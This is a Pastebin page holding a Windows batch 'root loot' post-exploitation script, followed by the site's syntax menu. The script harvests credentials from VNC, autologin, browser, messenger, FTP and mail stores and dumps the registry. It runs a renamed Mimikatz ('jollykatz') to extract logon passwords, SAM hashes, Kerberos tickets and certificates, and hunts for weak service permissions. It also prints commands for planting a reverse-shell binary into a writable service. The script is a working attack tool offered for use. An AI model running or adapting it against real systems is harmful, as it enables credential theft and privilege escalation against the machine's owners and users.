Pastebin
API
tools
faq
paste
Login
Sign up
Please fix the following errors:
New Paste
Syntax Highlighting
@echo OFF call:credits call:CheckOSbitrate call:CheckOSversion call:checkprerequisitefiles call:checkquickwins call:getfirewallinformation call:getcomputerinformation call:dumphashespasseskerberoscerts call:findinterestingfiles call:findinterestingregistrykeys call:findpasswords call:checkweakpermissions call:cleanup goto end :credits echo.---------------------------------------------------- echo.Author: Jollyfrogs, Brisbane QLD echo.A root loot script I used to learn batch techniquesP, needs TLC echo.---------------------------------------------------- echo. goto:eof :CheckOSbitrate IF DEFINED ProgramFiles(x86) (set OSbit=64) else (set OSbit=32) goto:eof :checkprerequisitefiles REM SOME OF THESE COMMANDS MIGHT GENERATE ERRORS SO WE CATCH THEM ALL HERE echo ==================================================================== echo ====================== IGNORE THESE ERRORS ========================= dir jollykatz%OSbit%.exe /a/s/b 1> nul 2> NUL IF %ERRORLEVEL% == 0 set jollykatz=1 for /f "tokens=1 delims=" %%a in ('whoami') do set whoami=%%a for /f "tokens=1 delims=" %%a in ('netsh /? ^| findstr \.*.irewal.*.*') do set netshfirewall=%%a REM REM check registry for the following registry entries: REM reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL IF %ERRORLEVEL% == 0 ( reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL IF %ERRORLEVEL% == 0 (set alwaysinstallelevated=1) ) reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage" 1>NUL IF %ERRORLEVEL% == 0 (set IE6found=1) reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2" 1>NUL IF %ERRORLEVEL% == 0 (set IE7found=1) reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords" 1>NUL IF %ERRORLEVEL% == 0 (set AIM6found=1) reg query "HKCU\SOFTWARE\AIM\AIMPRO" 1>NUL IF %ERRORLEVEL% == 0 (set AIMPROfound=1) reg query "HKCU\SOFTWARE\Beyluxe Messenger" 1>NUL IF %ERRORLEVEL% == 0 (set BEYLUXEfound=1) reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting" 1>NUL IF %ERRORLEVEL% == 0 (set BIGANTfound=1) reg query "HKCU\SOFTWARE\Camfrog\Client" 1>NUL IF %ERRORLEVEL% == 0 (set CAMFROGfound=1) reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts" 1>NUL IF %ERRORLEVEL% == 0 (set GOOGLETALKfound=1) reg query "HKCU\SOFTWARE\IMVU" 1>NUL IF %ERRORLEVEL% == 0 (set IMVUfound=1) reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application" 1>NUL IF %ERRORLEVEL% == 0 (set NIMBUZZfound=1) reg query "HKCU\SOFTWARE\Paltalk" 1>NUL IF %ERRORLEVEL% == 0 (set PALTALKfound=1) reg query "HKCU\SOFTWARE\Yahoo\Pager" 1>NUL IF %ERRORLEVEL% == 0 (set YAHOOPAGERfound=1) reg query "HKCU\SOFTWARE\IncrediMail" 1>NUL IF %ERRORLEVEL% == 0 (set INCREDIMAILfound=1) reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook" 1>NUL IF %ERRORLEVEL% == 0 (set OUTLOOK2013found=1) reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles" 1>NUL IF %ERRORLEVEL% == 0 (set OUTLOOK2010POSTNTfound=1) reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles" 1>NUL IF %ERRORLEVEL% == 0 (set OUTLOOK2010PRENTfound=1) reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts" 1>NUL IF %ERRORLEVEL% == 0 (set OUTLOOK98MAILONLYfound=1) reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts" 1>NUL IF %ERRORLEVEL% == 0 (set OUTLOOK98NORMALfound=1) reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites" 1>NUL IF %ERRORLEVEL% == 0 (set DREAMWEAVERfound=1) reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail" 1>NUL IF %ERRORLEVEL% == 0 (set GMAILDESKTOPfound=1) reg query "HKCU\SOFTWARE\DownloadManager\Passwords" 1>NUL IF %ERRORLEVEL% == 0 (set IDMfound=1) reg query "HKCU\SOFTWARE\Google\Picasa" 1>NUL IF %ERRORLEVEL% == 0 (set PICASAfound=1) reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" 1> NUL IF %ERRORLEVEL% == 0 (set realvncpassfound=1) reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" 1> NUL IF %ERRORLEVEL% == 0 (set tightvncpassfound1=1) reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" 1> NUL IF %ERRORLEVEL% == 0 (set tightvncpassfound2=1) reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" 1> NUL IF %ERRORLEVEL% == 0 (set tigervncpassfound=1) reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" 1> NUL IF %ERRORLEVEL% == 0 (set vnc3passfound1=1) reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" 1> NUL IF %ERRORLEVEL% == 0 (set vnc3passfound2=1) reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" 1> NUL IF %ERRORLEVEL% == 0 (set vnc3passfound3=1) reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" 1> NUL IF %ERRORLEVEL% == 0 ( For /F "Tokens=2*" %%a In ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword') Do set defaultloginpass=%%b REM we check if the registry key is not null IF NOT [%defaultloginpass%] == [] set winautologinpassfound=1 set defaultloginpass= ) reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" 1> NUL IF %ERRORLEVEL% == 0 (set winautologinuserfound=1) reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" 1> NUL IF %ERRORLEVEL% == 0 (set winautologindomainfound=1) REM REM echo ====================== IGNORE THESE ERRORS ========================= echo ==================================================================== echo. goto:eof :CheckOSVersion @echo off ver | find "2003" > nul if %ERRORLEVEL% == 0 goto ver_2003 ver | find "XP" > nul if %ERRORLEVEL% == 0 goto ver_xp ver | find "2000" > nul if %ERRORLEVEL% == 0 goto ver_2000 ver | find "NT" > nul if %ERRORLEVEL% == 0 goto ver_nt if not exist %SystemRoot%\system32\systeminfo.exe goto versioncheckwarnthenexit systeminfo | find "OS Name" > %TEMP%\osname.txt FOR /F "usebackq delims=: tokens=2" %%i IN (%TEMP%\osname.txt) DO set vers=%%i echo %vers% | find "Windows 7" > nul if %ERRORLEVEL% == 0 goto ver_7 echo %vers% | find "Windows Server 2008" > nul if %ERRORLEVEL% == 0 goto ver_2008 echo %vers% | find "Windows Vista" > nul if %ERRORLEVEL% == 0 goto ver_vista goto warnthenexit :ver_7 :Run Windows 7 specific commands here. set OSVersion=WIN7 goto versioncheckexit :ver_2008 :Run Windows Server 2008 specific commands here. set OSVersion=WIN2008 goto versioncheckexit :ver_vista :Run Windows Vista specific commands here. set OSVersion=WINVISTA goto versioncheckexit :ver_2003 :Run Windows Server 2003 specific commands here. set OSVersion=WIN2003 goto versioncheckexit :ver_xp :Run Windows XP specific commands here. set OSVersion=WINXP goto versioncheckexit :ver_2000 :Run Windows 2000 specific commands here. set OSVersion=WIN2000 goto versioncheckexit :ver_nt :Run Windows NT specific commands here. set OSVersion=WINNT goto versioncheckexit :versioncheckwarnthenexit set OSVersion=UNDETERMINED goto:versioncheckexit :versioncheckexit goto:eof :checkquickwins systeminfo > systeminfo.txt REM === Generic tests across all Windows versions here IF DEFINED alwaysinstallelevated ( echo **** !!! VULNERABLE TO ALWAYSINSTALLELEVATED !!! **** set alwaysinstallelevated= echo. ) IF DEFINED realvncpassfound ( echo **** !!! REALVNC PASS FOUND !!! **** reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" echo ************************************ set realvncpassfound= echo. ) IF DEFINED tightvncpassfound1 ( echo **** !!! TIGHTVNC PASS FOUND !!! **** reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" echo ************************************* set tightvncpassfound1= echo. ) IF DEFINED tightvncpassfound2 ( echo **** !!! TIGHTVNC VIEWONLY PASS FOUND !!! **** reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" echo ********************************************** set tightvncpassfound2= echo. ) IF DEFINED tigervncpassfound ( echo **** !!! TIGERVNC PASS FOUND !!! **** reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" echo ************************************* set tigervncpassfound= echo. ) IF DEFINED vnc3passfound1 ( echo **** !!! VNC3 PASS FOUND !!! **** reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" echo ********************************* set vnc3passfound1= echo. ) IF DEFINED vnc3passfound2 ( echo **** !!! VNC3 PASS FOUND !!! **** reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" echo ********************************* set vnc3passfound2= echo. ) IF DEFINED vnc3passfound3 ( echo **** !!! VNC3 PASS FOUND !!! **** reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" echo ********************************* set vnc3passfound3= echo. ) IF DEFINED winautologinpassfound ( echo **** !!! WINDOWS AUTOLOGIN PASS FOUND !!! **** reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" echo ********************************************** IF DEFINED Winautologinuserfound ( reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" set winautologinuserfound= ) IF DEFINED winautologindomainfound ( reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" set winautologindomainfound= ) set winautologinpassfound= ) goto:eof if %OSVersion%==WINXP ( REM Maybe we can do something nice with this, haven't found a really good use yet other than it does work, too many KB's and interdependencies on KB patches REM for /f "tokens=1 delims=" %%a in ('type systeminfo.txt ^| findstr /C:"KB147222"') do set MYKB=%%a REM if NOT DEFINED MYKB echo == VULNERABLE TO KBasfjsdfj REM set MYKB= REM echo. ) goto:eof :getfirewallinformation echo. IF DEFINED netshfirewall ( echo. echo.Firewall Status echo.--------------- netsh firewall show state echo. echo. echo.Firewall configuration details echo.------------------------------ echo. netsh firewall show config echo. ) ELSE ( echo === NOTE: The netsh firewall command was not found, skipping checks === ) echo. goto:eof :getcomputerinformation echo. echo.This computer is running %OSbit%-bit Windows echo. IF DEFINED whoami ( echo. echo.Are we running an elevated command prompt? echo.------------------------------------------ for /f "tokens=1 delims=" %%a in ('whoami /groups ^| findstr \.*High.Man') do set runningelevatedprompt=%%a IF DEFINED runningelevatedprompt ( echo YES, we ARE! ) ELSE ( echo Sadly, no... ) echo. echo.User Groups echo.----------- whoami /groups echo. ) ELSE ( echo === NOTE: The whoami command was not found, skipping checks === ) echo. echo.User Accounts echo.------------- net users echo. echo.Systeminfo echo.---------- systeminfo echo. echo.Netstat -ano echo.------------ netstat -ano echo. echo.Scheduled tasks echo.--------------- schtasks /query /fo LIST /v echo. echo.Task to service mapping echo.----------------------- tasklist /SVC echo. echo.Network settings echo.---------------- ipconfig /all echo. echo.Running windows services echo.------------------------ net start echo. echo.Listing Windows drivers echo.----------------------- DRIVERQUERY echo. echo.Dumping Windows registry to registrydump.txt echo.-------------------------------------------- reg query HKLM /s > registrydump.txt reg query HKCU /s >> registrydump.txt echo. echo.Environment variables echo.--------------------- set echo. echo.Group Policy echo.------------ gpresult /R 1>2>NUL IF %ERRORLEVEL% == 1 ( REM WINXP gpresult ) ELSE ( REM WIN7 gpresult /R ) echo. REM ** ALEX TO ADD CREDENUMERATE ** goto:eof :dumphashespasseskerberoscerts echo.Hashes, passwords, kerberos tickets and certificates echo.----------------- IF NOT DEFINED jollykatz echo === NOTE: Jollykatz%OSbit%.exe not found, skipping jollykatz checks === IF NOT DEFINED jollykatz goto:eof echo. echo.sekurlsa::logonPasswords full echo.------ jollykatz%OSbit%.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit" echo. echo.lsadump::sam echo.------ jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit" echo. echo.sekurlsa::tickets /export echo.------ jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit" echo. echo.crypto::certificates /export (CERT_SYSTEM_STORE_CURRENT_USER) echo.------ jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_CURRENT_USER /store:my /export" "exit" echo. echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE) echo.------ jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:my /export" "exit" echo. echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE) echo.------ jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE /store:my /export" "exit" echo. echo.crypto::certificates /export (CERT_SYSTEM_STORE_USERS) echo.------ jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_USERS /store:my /export" "exit" echo. goto:eof :findinterestingfiles echo.Interesting files and directories echo.--------------------------------- dir C:\* /a/s/b > dirlisting.txt type dirlisting.txt | findstr /I \.*proof[.]txt$ type dirlisting.txt | findstr /I \.*network-secret[.]txt$ type dirlisting.txt | findstr /I \.*ssh.*[.]ini$ type dirlisting.txt | findstr /I \.*ultravnc[.]ini$ type dirlisting.txt | findstr /I \.*vnc[.]ini$ type dirlisting.txt | findstr /I \.*bthpan[.]sys$ type dirlisting.txt | findstr /I \.*\\repair$ type dirlisting.txt | findstr /I \.*passw*. | findstr /VI \.*.chm$ | findstr /VI \.*.log$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ type dirlisting.txt | findstr /I \.*[.]vnc$ type dirlisting.txt | findstr /I \.*groups[.]xml$ type dirlisting.txt | findstr /I \.*printers[.]xml$ type dirlisting.txt | findstr /I \.*drives[.]xml$ type dirlisting.txt | findstr /I \.*scheduledtasks[.]xml$ type dirlisting.txt | findstr /I \.*services[.]xml$ type dirlisting.txt | findstr /I \.*datasources[.]xml$ type dirlisting.txt | findstr /I \.*.rsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.rat$ type dirlisting.txt | findstr /I \.*.dsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ | findstr /VI \.*.gif$ | findstr /VI \.*.handsafe[.]reg$ type dirlisting.txt | findstr /I \.*[.]dbx$ type dirlisting.txt | findstr /I \.*.account.*.$ | findstr /VI \.*.User.Account.Picture.*. | findstr /VI \.*.bmp$ type dirlisting.txt | findstr /I \.*ntds[.].*$ type dirlisting.txt | findstr /I \.*hiberfil[.].*$ type dirlisting.txt | findstr /I \.*boot[.]ini$ type dirlisting.txt | findstr /I \.*win[.]ini$ type dirlisting.txt | findstr /I \.*.\\config\\RegBack type dirlisting.txt | findstr /I \.*.\\CCM\\logs type dirlisting.txt | findstr /I \.*.\\iis.[.]log$ type dirlisting.txt | findstr /I \.*.\\Content.IE.\\index.dat$ type dirlisting.txt | findstr /I \.*.\\inetpub\\logs\\LogFiles type dirlisting.txt | findstr /I \.*.\\httperr\\httpe.*.[.]log$ type dirlisting.txt | findstr /I \.*.\\logfiles\\w3svc1\\ex.*.[.]log$ type dirlisting.txt | findstr /I \.*.\\Panther\\ | findstr /VI \.*.Resources\\Themes\\.*. type dirlisting.txt | findstr /I \.*.syspre.*,[.]...$ type dirlisting.txt | findstr /I \.*.unatten.*.[.]txt$ type dirlisting.txt | findstr /I \.*.unatten.*.[.]xml$ type dirlisting.txt | findstr /I \.*Login.Data$ type dirlisting.txt | findstr /I \.*Web.Data$ type dirlisting.txt | findstr /I \.*Credentials.Store$ type dirlisting.txt | findstr /I \.*Credential.Store$ type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.* REM Avant Browser: type dirlisting.txt | findstr /I \.*forms[.]dat[.]vdt$ type dirlisting.txt | findstr /I \.*default\\formdata\\forms[.]dat$ REM Comodo Dragon type dirlisting.txt | findstr /I \.*Dragon\\User.Data\\Default.* REM CoolNovo type dirlisting.txt | findstr /I \.*ChromePlus\\User.Data\\Default.* REM Firefox type dirlisting.txt | findstr /I \.*Firefox\\Profiles\\.*[.]default$ type dirlisting.txt | findstr /I \.*key3[.]db$ REM Flock Browser type dirlisting.txt | findstr /I \.*Flock\\User.Data\\Default.* REM Google Chrome type dirlisting.txt | findstr /I \.*Chrome\\User.Data\\Default.* type dirlisting.txt | findstr /I \.*Chrome.SXS\\User.Data\\Default.* REM Internet Explorer type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.* REM Maxthon type dirlisting.txt | findstr /I \.*MagicFill.* type dirlisting.txt | findstr /I \.*MagicFill2[.]dat$ REM Opera type dirlisting.txt | findstr /I \.*Wand[.]dat$ REM Safari type dirlisting.txt | findstr /I \.*keychain[.]plist$ REM SeaMonkey type dirlisting.txt | findstr /I \.*signons[.]sqlite$ REM AIM type dirlisting.txt | findstr /I \.*aimx[.]bin$ REM Digsby type dirlisting.txt | findstr /I \.*logininfo[.]yaml$ type dirlisting.txt | findstr /I \.*digsby[.]dat$ REM Meebo Notifier type dirlisting.txt | findstr /I \.*MeeboAccounts[.]txt$ REM Miranda IM type dirlisting.txt | findstr /I \.*Miranda\\.*[.]dat$ REM MySpace IM type dirlisting.txt | findstr /I \.*MySpace\\IM\\users[.]txt$ REM Pidgin type dirlisting.txt | findstr /I \.*Accounts[.]xml$ REM Skype type dirlisting.txt | findstr /I \.*Skype.*config[.]xml$ REM Tencent QQ type dirlisting.txt | findstr /I \.*Registry[.]db$ REM Trillian type dirlisting.txt | findstr /I \.*accounts[.]ini$ REM XFire type dirlisting.txt | findstr /I \.*XfireUser[.]ini$ REM Foxmail type dirlisting.txt | findstr /I \.*Account[.]stg$ type dirlisting.txt | findstr /I \.*Accounts[.]tdat$ REM ThunderBird type dirlisting.txt | findstr /I \.*signons[.]sqlite$ REM Windows Live Mail type dirlisting.txt | findstr /I \.*[.]oeaccount$ REM FileZilla type dirlisting.txt | findstr /I \.*recentservers[.]xml$ REM FlashFXP type dirlisting.txt | findstr /I \.*Sites[.]dat$ REM FTPCommander type dirlisting.txt | findstr /I \.*Ftplist[.]txt$ REM SmartFTP type dirlisting.txt | findstr /I \.*SmartFTP.*[.]xml$ REM WS_FTP type dirlisting.txt | findstr /I \.*ws_ftp[.]ini$ REM Heroes of Newerth type dirlisting.txt | findstr /I \.*login[.]cfg$ REM JDownloader type dirlisting.txt | findstr /I \.*JDownloader.* type dirlisting.txt | findstr /I \.*database[.]script$ type dirlisting.txt | findstr /I \.*accounts[.]ejs$ REM OrbitDownloader type dirlisting.txt | findstr /I \.*sitelogin[.]dat$ REM Seesmic type dirlisting.txt | findstr /I \.*data[.]db$ REM SuperPutty type dirlisting.txt | findstr /I \.*sessions[.]xml$ REM TweetDeck type dirlisting.txt | findstr /I \.*TweetDeck.* type dirlisting.txt | findstr /I \.*[.]localstorage$ echo. goto:eof :findinterestingregistrykeys REM Source: securityxploded dot com slash passwordsecrets dot php IF EXIST AIM6found (reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords") IF EXIST AIMPROfound (reg query "HKCU\SOFTWARE\AIM\AIMPRO") IF EXIST IE6found (reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage") IF EXIST IE7found (reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2") IF EXIST BEYLUXEfound (reg query "HKCU\SOFTWARE\Beyluxe Messenger") IF EXIST BIGANTfound (reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting") IF EXIST CAMFROGfound (reg query "HKCU\SOFTWARE\Camfrog\Client") IF EXIST GOOGLETALKfound (reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts") IF EXIST IMVUfound (reg query "HKCU\SOFTWARE\IMVU") IF EXIST NIMBUZZfound (reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application") IF EXIST PALTALKfound (reg query "HKCU\SOFTWARE\Paltalk") IF EXIST YAHOOPAGERfound (reg query "HKCU\SOFTWARE\Yahoo\Pager") IF EXIST INCREDIMAIL (reg query "HKCU\SOFTWARE\IncrediMail") IF EXIST OUTLOOK2013found (reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook") IF EXIST OUTLOOK2010POSTNTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles") IF EXIST OUTLOOK2010PRENTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles") IF EXIST OUTLOOK98MAILONLYfound (reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts") IF EXIST OUTLOOK98NORMALfound (reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts") IF EXIST DREAMWEAVERfound (reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites") IF EXIST GMAILDESKTOPfound (reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail") IF EXIST IDMfound (reg query "HKCU\SOFTWARE\DownloadManager\Passwords") IF EXIST PICASAfound (reg query "HKCU\SOFTWARE\Google\Picasa") REM :findpasswords echo.Searching for passwords (this can take a while) echo.----------------------------------------------- findstr /si pwd= *.xml *.ini *.txt findstr /si password= *.xml *.ini *.txt findstr /si pass= *.xml *.ini *.txt goto:eof :checkweakpermissions echo.Searching for weak service permissions (this can take a while) echo.-------------------------------------------------------------- if exist serviceexes.txt del serviceexes.txt if exist dirlisting.txt del dirlisting.txt dir \ /a/s/b > dirlisting.txt for /f "tokens=1 delims=," %%a in ('tasklist /SVC /FO CSV ^| findstr /I \.*exe*. ^| findstr /VI "smss.exe csrss.exe winlogon.exe services.exe spoolsv.exe explorer.exe ctfmon.exe wmiprvse.exe msmsgs.exe notepad.exe lsass.exe svchost.exe findstr.exe cmd.exe tasklist.exe"') do (findstr %%a$ | findstr /VI "\.*winsxs\\*.") <dirlisting.txt >> serviceexes.txt REM In the line below we parse serviceexes.txt and check each line for write access. We check write access by appending (writing) nothing to the file, we then use batch logic to test results and output results in echo REM for /f "tokens=*" %%a in (serviceexes.txt) do 2>nul (>>%%a echo off) && (echo === !!! RW access to service executable: %%a !!! ===) || (call) REM Ninja magic to find out if we have write access, only partially reliable so decided to go with cacls instead REM @echo off & 2>nul (>>"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" echo off) && (echo RW access) || (echo no RW access) & echo on for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Users:"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call) for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Everyone"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call) echo.Files and folder with Read-Write access echo.--------------------------------------- dir accesschk.exe /a/s/b 1>2>NUL IF %ERRORLEVEL% == 0 ( echo === NOTE: accesschk.exe not found, skipping accesschk file permissions checks === goto:eof ) accesschk.exe /accepteula 1>2>NUL accesschk.exe -uwqs "Everyone" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*." accesschk.exe -uwqs "Users" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*." accesschk.exe -uwqs "Authenticated Users" c:\*.* | findstr /VI \.*System.Volume.Information*. | findstr /VI \.*Documents.And.Settings*. echo.Searching for weak service permissions echo.-------------------------------------- accesschk.exe -uwcqv "Authenticated Users" * | Find "RW " 1> NUL if %ERRORLEVEL% == 0 ( echo.**** !!! VULNERABLE SERVICES FOUND - Authenticated Users!!! **** accesschk.exe -uwcqv "Authenticated Users" * echo.**************************************************************** echo. ) accesschk.exe /accepteula 1>2>NUL accesschk.exe -uwcqv "Users" * | Find "RW " 1> NUL if %ERRORLEVEL% == 0 ( echo.**** !!! VULNERABLE SERVICES FOUND - All Users !!! **** accesschk.exe -uwcqv "Users" * echo.******************************************************* echo.To plant binary in service use: echo.sc config [service_name] binpath= "C:\rshell.exe" echo.sc config [service_name] obj= ".\LocalSystem" password= "" echo.sc qc [service_name] (to verify!) echo.net start [service_name] echo.******************************************************* ) accesschk.exe /accepteula 1>2>NUL accesschk.exe -uwcqv "Everyone" * | Find "RW " 1> NUL if %ERRORLEVEL% == 0 ( echo.**** !!! VULNERABLE SERVICES FOUND - Everyone !!! **** accesschk.exe -uwcqv "Everyone" * echo.******************************************************* echo.To plant binary in service use: echo.sc config [service_name] binpath= "C:\rshell.exe" echo.sc config [service_name] obj= ".\LocalSystem" password= "" echo.sc qc [service_name] (to verify!) echo.net start [service_name] echo.******************************************************* goto:eof :cleanup set jollykatz= set accesschk= set OSbit= set whoami= set runningelevatedprompt= set netshfirewall= set OSVersion= set alwaysinstallelevated= set realvncpassfound= set tightvncpassfound1= set tightvncpassfound2= set tigervncpassfound= set vnc3passfound1= set vnc3passfound2= set vnc3passfound3= set winautologinpassfound= set winautologindomainfound= set winautologinuserfound= set defaultloginpass= set IE6found= set IE7found= set AIM6found= set AIMPROfound= set BEYLUXEfound= set BIGANTfound= set CAMFROGfound= set GOOGLETALKfound= set IMVUfound= set NIMBUZZfound= set PALTALKfound= set YAHOOPAGERfound= set INCREDIMAILfound= set OUTLOOK2013found= set OUTLOOK2010POSTNTfound= set OUTLOOK2010PRENTfound= set OUTLOOK98MAILONLYfound= set OUTLOOK98NORMALfound= goto:eof :end echo. echo.============== echo.Dump complete! echo.============== GOTO:eof
Optional Paste Settings
Category:
None
Cryptocurrency
Cybersecurity
Fixit
Food
Gaming
Haiku
Help
History
Housing
Jokes
Legal
Money
Movies
Music
Pets
Photo
Science
Software
Source Code
Spirit
Sports
Travel
TV
Writing
Tags:
Syntax Highlighting:
None
Bash
C
C#
C++
CSS
HTML
JSON
Java
JavaScript
Lua
Markdown (PRO members only)
Objective C
PHP
Perl
Python
Ruby
Swift
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
ABAP
AIMMS
ALGOL 68
APT Sources
ARM
ASM (NASM)
ASP
ActionScript
ActionScript 3
Ada
Apache Log
AppleScript
Arduino
Asymptote
AutoIt
Autohotkey
Avisynth
Awk
BASCOM AVR
BNF
BOO
Bash
Basic4GL
Batch
BibTeX
Blitz Basic
Blitz3D
BlitzMax
BrainFuck
C
C (WinAPI)
C Intermediate Language
C for Macs
C#
C++
C++ (WinAPI)
C++ (with Qt extensions)
C: Loadrunner
CAD DCL
CAD Lisp
CFDG
CMake
COBOL
CSS
Ceylon
ChaiScript
Chapel
Clojure
Clone C
Clone C++
CoffeeScript
ColdFusion
Cuesheet
D
DCL
DCPU-16
DCS
DIV
DOT
Dart
Delphi
Delphi Prism (Oxygene)
Diff
E
ECMAScript
EPC
Easytrieve
Eiffel
Email
Erlang
Euphoria
F#
FO Language
Falcon
Filemaker
Formula One
Fortran
FreeBasic
FreeSWITCH
GAMBAS
GDB
GDScript
Game Maker
Genero
Genie
GetText
Go
Godot GLSL
Groovy
GwBasic
HQ9 Plus
HTML
HTML 5
Haskell
Haxe
HicEst
IDL
INI file
INTERCAL
IO
ISPF Panel Definition
Icon
Inno Script
J
JCL
JSON
Java
Java 5
JavaScript
Julia
KSP (Kontakt Script)
KiXtart
Kotlin
LDIF
LLVM
LOL Code
LScript
Latex
Liberty BASIC
Linden Scripting
Lisp
Loco Basic
Logtalk
Lotus Formulas
Lotus Script
Lua
M68000 Assembler
MIX Assembler
MK-61/52
MPASM
MXML
MagikSF
Make
MapBasic
Markdown (PRO members only)
MatLab
Mercury
MetaPost
Modula 2
Modula 3
Motorola 68000 HiSoft Dev
MySQL
Nagios
NetRexx
Nginx
Nim
NullSoft Installer
OCaml
OCaml Brief
Oberon 2
Objeck Programming Langua
Objective C
Octave
Open Object Rexx
OpenBSD PACKET FILTER
OpenGL Shading
Openoffice BASIC
Oracle 11
Oracle 8
Oz
PARI/GP
PCRE
PHP
PHP Brief
PL/I
PL/SQL
POV-Ray
ParaSail
Pascal
Pawn
Per
Perl
Perl 6
Phix
Pic 16
Pike
Pixel Bender
PostScript
PostgreSQL
PowerBuilder
PowerShell
ProFTPd
Progress
Prolog
Properties
ProvideX
Puppet
PureBasic
PyCon
Python
Python for S60
QBasic
QML
R
RBScript
REBOL
REG
RPM Spec
Racket
Rails
